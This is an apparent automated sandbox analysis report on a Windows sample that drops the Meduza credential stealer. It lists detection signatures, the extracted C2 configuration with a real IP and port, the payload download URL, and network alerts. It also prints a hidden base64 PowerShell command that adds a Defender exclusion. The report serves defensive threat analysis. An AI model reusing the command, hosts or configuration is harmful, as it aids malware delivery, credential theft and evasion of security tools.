Edit tour

Windows Analysis Report
HZ1BUCfTne.exe

Overview

General Information

Sample name:	HZ1BUCfTne.exe renamed because original name is a hash value
Original sample name:	306c35f0a8b13eb8d3ff43f0fe031c9b2d008fddebe501e47e080111ebbb9712.exe
Analysis ID:	1556354
MD5:	d9ecf06c01f13e20c692308977343e6c
SHA1:	895103bff07402081cf606e943a9b305bab14798
SHA256:	306c35f0a8b13eb8d3ff43f0fe031c9b2d008fddebe501e47e080111ebbb9712
Tags:	45-130-145-152exeuser-JAMESWT_MHT
Infos:

Detection

CredGrabber, Meduza Stealer

Score:	87
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected CredGrabber

Yara detected Meduza Stealer

AI detected suspicious sample

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Execution of Powershell with Base64

Suricata IDS alerts with low severity for network traffic

Terminates after testing mutex exists (may check infected machine status)

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

HZ1BUCfTne.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\HZ1BUCfTne.exe" MD5: D9ECF06C01F13E20C692308977343E6C)

powershell.exe (PID: 8152 cmdline: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6464 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

sUKFphHSzX.exe (PID: 1440 cmdline: "C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe" MD5: 183E24B654414D7BE786CCD8E6A108A5)

cleanup

Malware Configuration

Threatname: Meduza Stealer

{"C2 url": "45.130.145.152", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite", "build_name": "Work", "links": "", "port": 15666}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Process Memory Space: sUKFphHSzX.exe PID: 1440	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
Process Memory Space: sUKFphHSzX.exe PID: 1440	JoeSecurity_CredGrabber	Yara detected CredGrabber	Joe Security
Process Memory Space: sUKFphHSzX.exe PID: 1440	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.sUKFphHSzX.exe.209334e0000.0.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security
9.2.sUKFphHSzX.exe.209334e0000.0.raw.unpack	JoeSecurity_MeduzaStealer	Yara detected Meduza Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==, CommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HZ1BUCfTne.exe", ParentImage: C:\Users\user\Desktop\HZ1BUCfTne.exe, ParentProcessId: 7796, ParentProcessName: HZ1BUCfTne.exe, ProcessCommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==, ProcessId: 8152, ProcessName: powershell.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==, CommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HZ1BUCfTne.exe", ParentImage: C:\Users\user\Desktop\HZ1BUCfTne.exe, ParentProcessId: 7796, ParentProcessName: HZ1BUCfTne.exe, ProcessCommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==, ProcessId: 8152, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==, CommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HZ1BUCfTne.exe", ParentImage: C:\Users\user\Desktop\HZ1BUCfTne.exe, ParentProcessId: 7796, ParentProcessName: HZ1BUCfTne.exe, ProcessCommandLine: "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==, ProcessId: 8152, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T10:29:30.224291+0100	2049441	1	A Network Trojan was detected	192.168.2.10	49927	45.130.145.152	15666	TCP

ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T10:29:30.224291+0100	2050806	1	A Network Trojan was detected	192.168.2.10	49927	45.130.145.152	15666	TCP
2024-11-15T10:29:30.229420+0100	2050806	1	A Network Trojan was detected	192.168.2.10	49927	45.130.145.152	15666	TCP

ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T10:29:30.224291+0100	2050807	1	A Network Trojan was detected	192.168.2.10	49927	45.130.145.152	15666	TCP
2024-11-15T10:29:30.229420+0100	2050807	1	A Network Trojan was detected	192.168.2.10	49927	45.130.145.152	15666	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 9.2.sUKFphHSzX.exe.209334e0000.0.unpack

Malware Configuration Extractor: Meduza Stealer {"C2 url": "45.130.145.152", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite", "build_name": "Work", "links": "", "port": 15666}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933551EA0 CryptUnprotectData,LocalFree,	9_2_0000020933551EA0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335521C0 CryptProtectData,LocalFree,	9_2_00000209335521C0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933515EE0 CryptUnprotectData,LocalFree,	9_2_0000020933515EE0

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.10:49928 version: TLS 1.2

Source: HZ1BUCfTne.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\TonySoprano\Videos\cplus\test\sharp\Installer_sharp\obj\Release\Installer_sharp.pdb source: HZ1BUCfTne.exe

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933599810 FindClose,FindFirstFileExW,GetLastError,	9_2_0000020933599810
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335998C0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,	9_2_00000209335998C0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335B24E8 FindFirstFileExW,	9_2_00000209335B24E8

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_00000209335613B0 GetLogicalDriveStringsW,

9_2_00000209335613B0

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\migration\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\replacementmanifests\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\migration\wtr\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	File opened: D:\sources\replacementmanifests\hwvid-migration-2\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049441 - Severity 1 - ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt : 192.168.2.10:49927 -> 45.130.145.152:15666
Source: Network traffic	Suricata IDS: 2050806 - Severity 1 - ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2 : 192.168.2.10:49927 -> 45.130.145.152:15666

Source: global traffic

TCP traffic: 192.168.2.10:49927 -> 45.130.145.152:15666

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 15 Nov 2024 09:28:57 GMTContent-Type: application/octet-streamContent-Length: 2632704Last-Modified: Thu, 14 Nov 2024 19:32:03 GMTConnection: keep-aliveETag: "67365033-282c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 54 97 d1 e9 35 f9 82 e9 35 f9 82 e9 35 f9 82 f9 b1 fa 83 e1 35 f9 82 f9 b1 fd 83 e6 35 f9 82 f9 b1 fc 83 ba 35 f9 82 a2 4d fc 83 48 35 f9 82 a2 4d fa 83 ee 35 f9 82 a2 4d fd 83 fa 35 f9 82 d1 b5 fc 83 eb 35 f9 82 a1 b0 fd 83 cd 35 f9 82 a2 4d f8 83 e2 35 f9 82 e9 35 f8 82 68 35 f9 82 a2 b0 f0 83 fa 35 f9 82 a2 b0 06 82 e8 35 f9 82 a2 b0 fb 83 e8 35 f9 82 52 69 63 68 e9 35 f9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e8 4f 34 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 6a 03 00 00 d6 24 00 00 00 00 00 f0 d0 02 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 28 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 e6 27 00 64 00 00 00 00 60 28 00 e0 01 00 00 00 30 28 00 70 2c 00 00 00 00 00 00 00 00 00 00 00 70 28 00 50 09 00 00 00 96 27 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 94 27 00 40 01 00 00 00 00 00 00 00 00 00 00 00 80 03 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 70 24 00 00 80 03 00 00 72 24 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 cc 28 00 00 00 00 28 00 00 12 00 00 00 e0 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 70 2c 00 00 00 30 28 00 00 2e 00 00 00 f2 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 60 28 00 00 02 00 00 00 20 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 70 28 00 00 0a 00 00 00 22 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; /Host: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /brozer.exe HTTP/1.1Host: 150.241.95.163Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 45.130.145.152 45.130.145.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: ASBAXETNRU ASBAXETNRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2050807 - Severity 1 - ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) : 192.168.2.10:49927 -> 45.130.145.152:15666

Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163
Source: unknown	TCP traffic detected without corresponding DNS query: 150.241.95.163

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_000002093355F200 InternetOpenA,InternetOpenUrlA,HttpQueryInfoW,HttpQueryInfoW,InternetQueryDataAvailable,InternetReadFile,InternetQueryDataAvailable,InternetCloseHandle,Concurrency::cancel_current_task,

9_2_000002093355F200

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; /Host: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /brozer.exe HTTP/1.1Host: 150.241.95.163Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: HZ1BUCfTne.exe, 00000000.00000002.2392236786.000000000708C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://150.241.95.163
Source: HZ1BUCfTne.exe, 00000000.00000002.2392236786.0000000007021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://150.241.95.163/brozer.exe
Source: HZ1BUCfTne.exe	String found in binary or memory: http://150.241.95.163/brozer.exeIError
Source: HZ1BUCfTne.exe, 00000000.00000002.2392236786.0000000007021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://150.241.95.163/brozer.exeP
Source: sUKFphHSzX.exe, 00000009.00000003.1753160348.0000020933A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1753067336.0000020933A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1681844399.0000020933A41000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1753038445.0000020933A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.microsoft.t/Regi
Source: powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1533581435.0000000004E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1533581435.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: HZ1BUCfTne.exe, 00000000.00000002.2392236786.000000000708C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1533581435.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1533581435.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1533581435.0000000004E37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1538262354.000000000733D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.1533581435.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: sUKFphHSzX.exe, 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/W
Source: sUKFphHSzX.exe, 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/w
Source: sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
